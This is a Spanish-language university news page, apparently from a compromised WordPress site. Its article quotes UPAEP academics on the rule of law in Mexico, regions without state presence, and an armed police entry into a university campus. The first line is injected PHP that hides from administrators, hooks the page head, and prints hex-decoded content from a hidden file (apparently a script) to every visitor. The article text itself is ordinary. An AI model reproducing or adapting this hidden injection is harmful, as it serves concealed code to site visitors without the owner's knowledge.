if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } En México, Gobierno y sociedad deben respetar el estado de derecho – La Opinión Universitaria La Opinión Universitaria
Menu

En México, Gobierno y sociedad deben respetar el estado de derecho

 

Cuando se habla de democracia, cuando se habla de los derechos humanos es importante tener presente el estado de derecho, en donde los ciudadanos y los mismos órganos del estado en su ejercicio, se someten a las leyes que regulan su actuar dentro de la sociedad.

El estado de derecho lo que busca es proteger a las personas o instituciones de quien cuando comete una arbitrariedad es el estado, el estado de derecho no sólo obliga a los ciudadanos a manejarse dentro de los límites que marca la ley, a disfrutar de los derechos que la ley reconoce, sino que también obliga al estado y al gobierno a actuar dentro del marco de las leyes, señaló Herminio Sánchez de la Barquera y Arroyo, Decano de Ciencias Sociales de la UPAEP.

Dijo que no se puede pensar en un régimen democrático si no existe un estado de derecho, si no existe ese respeto a la ley por parte de los ciudadanos y gobiernos. Tampoco se puede hablar de federalismo, si no se respeta el principio de subsidiariedad.

Con respecto a estrategias de seguridad, el hecho de que se tengan amplias zonas de país en donde no hay prácticamente presencia del estado mexicano, representa un atentado contra el estado de derecho. “Pensemos en la zona de tierra caliente en Michoacán; en la zona de los zapatistas en Chiapas; en las diferentes zonas de Tamaulipas; de Durango, Sinaloa y Chihuahua, en donde podemos ver que no hay presencia del estado, en donde los grupos de la delincuencia organizada, le regatean al estado el monopolio del uso de la fuerza”.

Además, hay que recordar que el estado de derecho es una consecuencia de la acción del estado, es resultado de la generación de las leyes, pero también tanto los ciudadanos como el estado y el gobierno, tenemos que regirnos por esas leyes y actuar dentro de las mismas; no nada más el estado o los ciudadanos, todos tenemos que regirnos por esas leyes, pero en algunas ocasiones se nos olvida por un asunto de cultura política; todos tenemos que guiarnos por lo que dicen las leyes, sin excepción, reiteró el académico.

Lamentó que en México todavía no se alcance ese nivel del estado de derecho plenamente consolidado. Al señalar, “en qué país civilizado del mundo, en este momento, en este año, el estado se mete a una universidad, privada o pública con la fuerza pública armada. Independientemente del asunto jurídico que está ahí presente y es muy lamentable en este momento; no es justificable la entrada de la policía armada con armas largas al campus universitario de esa institución… ¿realmente era necesario? Es algo lamentable y atenta contra el estado de derecho, no era una medida necesaria. Más bien se vio como una medida para impresionar, para amedrentar”.

Para Fernando Méndez Sánchez, director de la Facultad de Derecho de la UPAEP, las autoridades y ciudadanos, debemos tener presente que el estado de derecho es, sobre todo, un compromiso, no es algo que se dice en una ocasión, es algo que se reitera una y otra vez, es algo que se protege y se profesa permanentemente.

Tweets recientes